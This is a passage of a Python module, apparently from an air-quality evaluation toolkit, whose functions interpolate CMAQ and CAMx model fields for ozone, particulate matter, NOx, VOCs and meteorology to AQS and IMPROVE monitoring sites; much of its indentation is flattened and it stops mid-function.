                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'NH4f':
            if ('ANH4I' in model.keys) | ('ANH4J' in model.keys) | ('PM25_NH4' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='NH4f', improve_param=i)
                cmaq = model.get_var(lay=0, param='NH4f').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'ammSO4f':
            if ('ANH4I' in model.keys) | ('ANH4J' in model.keys) | ('PM25_NH4' in model.keys):
                dfpmso4 = g.get_group(i).copy()
                dfpmno3 = g.get_group('ammNO3f')
                dfpmso4.Species = 'NH4f'
                dfpm = dfpmso4.merge(dfpmno3[['Obs', 'datetime', 'Site_Code']],
                                     on=['datetime', 'Site_Code'])
                dfpm.rename(columns={'Obs_x': 'Obs'}, inplace=True)
                # NH4 implied by fully neutralized ammonium sulfate and nitrate
                dfpm.Obs = 2. * dfpm.Obs * 18. / 132. + dfpm.Obs_y * 18. / 80.
                dfpm.drop('Obs_y', axis=1, inplace=True)
                cmaq = model.get_var(lay=0, param='NH4f').compute()
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'NO3f':
            if ('ANO3I' in model.keys) | ('ANO3J' in model.keys) | ('PM25_NO3' in model.keys):
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='NO3f', improve_param=i)
                cmaq = model.get_var(lay=0, param='NO3f').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'FEf':
            if 'AFEJ' in model.keys:
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='FEf', improve_param=i)
                cmaq = model.get_var(lay=0, param='AFEJ').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'ALf':
            if 'AALF' in model.keys:
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='ALf', improve_param=i)
                cmaq = model.get_var(lay=0, param='AALF').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'MNf':
            if 'AMNJ' in model.keys:
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='MNf', improve_param=i)
                cmaq = model.get_var(lay=0, param='AMNJ').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
        elif i == 'OCf':
            if 'APOCJ' in model.keys:
                dfpm = g.get_group(i)
                fac = epa_util.check_cmaq_units(param='OCf', improve_param=i)
                cmaq = model.get_var(lay=0, param='OC').compute() * fac
                dfpm = interpo.interp_to_obs(cmaq, dfpm, model.latitude.values, model.longitude.values,
                                             radius=model.dset.XCELL)
                dfs.append(dfpm)
    df = concat(dfs)
    df.dropna(subset=['Obs', 'model'], inplace=True)
    return df
def combine_aqs_camx(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.df.groupby('Species')
comparelist = sort(obs.df.Species.unique())
dfs = []
for i in comparelist:
if (i == 'OZONE') and ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='O3', aqs_param=i)
cmaq = model.get_var(lay=0, param='O3').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
df.Units = 'PPB'
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) | ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'PM10':
            if ('PM_TOTAL' in model.keys) | ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO3F').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
                fac = epa_util.check_cmaq_units(df, param='OCf', aqs_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
df = interpo.interp_to_obs(cmaqvar, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df,
param='BENZENE', aqs_param=i)
cmaq = model.get_var(
lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df,
param='TOL', aqs_param=i)
cmaq = model.get_var(
lay=0, param='TOL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WD':
if ('WDIR10' in model.keys):
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
df = concat(dfs)
df.dropna(subset=['Obs', 'CAMx'], inplace=True)
return df
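Both combiners rely on the same pandas pattern: split the observation table by `Species` with `groupby`, attach a model value to each group, then `concat` the pieces back into one paired frame. A toy version of that skeleton (the `model` column here is fabricated for illustration; in MONET it comes from `interp_to_obs`):

```python
import pandas as pd

# Minimal observation table with two species.
obs = pd.DataFrame({'Species': ['OZONE', 'OZONE', 'CO'],
                    'Obs': [30.0, 42.0, 0.2]})

g = obs.groupby('Species')
dfs = []
for name in sorted(obs.Species.unique()):
    sub = g.get_group(name).copy()
    sub['model'] = sub.Obs * 1.1  # stand-in for the interpolated model value
    dfs.append(sub)

# One row per original observation, now carrying a paired model column.
paired = pd.concat(dfs)
```

Processing per group is what lets each species pick its own model variable and unit factor before the pieces are recombined.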
def combine_aqs_cmaq(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.df.groupby('Species')
comparelist = sort(obs.df.Species.unique())
dfs = []
for i in comparelist:
        if i == 'OZONE':
            print('Interpolating Ozone:')
            df = g.get_group(i)
            fac = epa_util.check_cmaq_units(df, param='O3', aqs_param=i)
            cmaq = model.get_var(lay=0, param='O3').compute() * fac
            df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
                                       radius=model.dset.XCELL)
            df.Units = 'PPB'
            dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) | ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in model.keys) or ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO3F').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
                fac = epa_util.check_cmaq_units(df, param='OCf', aqs_param=i)
cmaqvar = model.get_var(lay=0, param='OC').compute() * fac
df = interpo.interp_to_obs(cmaqvar, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='BENZENE', aqs_param=i)
cmaq = model.get_var(lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='TOL', aqs_param=i)
cmaq = model.get_var(lay=0, param='TOL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
elif i == 'WD':
if ('WDIR10' in model.keys):
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL)
dfs.append(df)
df = concat(dfs)
df.dropna(subset=['Obs', 'model'], inplace=True)
return df
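Each of these combine functions repeats the same per-species pattern: look up the model variable name for an observed species, apply a unit factor, interpolate, append. A minimal sketch of how that mapping could be table-driven — the `SPECIES_MAP` name and its entries are illustrative, not part of this module:

```python
# Illustrative only: maps an observed species to (model variable, fixed unit
# factor). A factor of None stands for "derive the factor from a unit check"
# such as epa_util.check_cmaq_units.
SPECIES_MAP = {
    'OZONE': ('O3', 1000.0),   # model ppm -> observation ppb
    'TOLUENE': ('TOL', None),
    'ISOPRENE': ('ISOP', None),
    'O-XYLENE': ('XYL', None),
    'WS': ('WSPD10', 1.0),     # met fields need no conversion
}

def resolve_species(species):
    """Return (model_param, factor) or None when the species is unmapped."""
    return SPECIES_MAP.get(species)
```

With such a table the long `elif` chain collapses to a single loop that simply skips species whose model variable is absent.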
def combine_daily_aqs_cmaq(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.d_df.groupby('Species')
comparelist = sort(obs.d_df.Species.unique())
    dfs = []  # collect one paired DataFrame per species
for i in comparelist:
if (i == 'OZONE') and ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = 1000.
cmaq = model.get_var(lay=0, param='O3').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
df.Units = 'PPB'
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOX':
if ('NO' in model.keys) & ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in model.keys) | ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
                cmaq = model.get_var(lay=0, param='NO3f').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
                fac = epa_util.check_cmaq_units(df, param='OCf', aqs_param=i)
                cmaq = model.get_var(lay=0, param='OC').compute() * fac
                df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='BENZENE', aqs_param=i)
cmaq = model.get_var(lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='TOL', aqs_param=i)
cmaq = model.get_var(lay=0, param='TOL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WD':
if 'WDIR10' in model.keys:
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
df = concat(dfs)
df.loc[df.Obs < 0] = NaN
return df
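The `check_cmaq_units` calls above return a multiplicative factor that puts model and observed values in the same units. A hedged sketch of that idea — the `unit_factor` helper is hypothetical, not the `epa_util` implementation:

```python
# Hypothetical helper: gas-phase mixing ratios scale by powers of 1000
# between ppm, ppb and ppt; identical units need no scaling. Exponents are
# kept as integers so the power of ten is computed exactly.
_EXP = {'ppm': -6, 'ppb': -9, 'ppt': -12}

def unit_factor(model_units, obs_units):
    """Factor that converts model values into the observation's units."""
    return 10.0 ** (_EXP[model_units.lower()] - _EXP[obs_units.lower()])

# e.g. a CMAQ ozone field in ppm compared against AQS ppb observations:
fac = unit_factor('ppm', 'ppb')  # 1000.0
```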
def combine_daily_aqs_camx(model, obs):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
Returns
-------
type
Description of returned object.
"""
g = obs.d_df.groupby('Species')
comparelist = sort(obs.d_df.Species.unique())
    dfs = []  # collect one paired DataFrame per species
for i in comparelist:
if (i == 'OZONE') and ('O3' in model.keys):
print('Interpolating Ozone:')
df = g.get_group(i)
fac = 1000.
            camx = model.get_var(lay=0, param='O3').compute() * fac
            df = interpo.interp_to_pt_obs(camx, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
df.Units = 'PPB'
dfs.append(df)
elif i == 'PM2.5':
if ('PM25_TOT' in model.keys) | ('ASO4J' in model.keys):
print('Interpolating PM2.5:')
df = g.get_group(i)
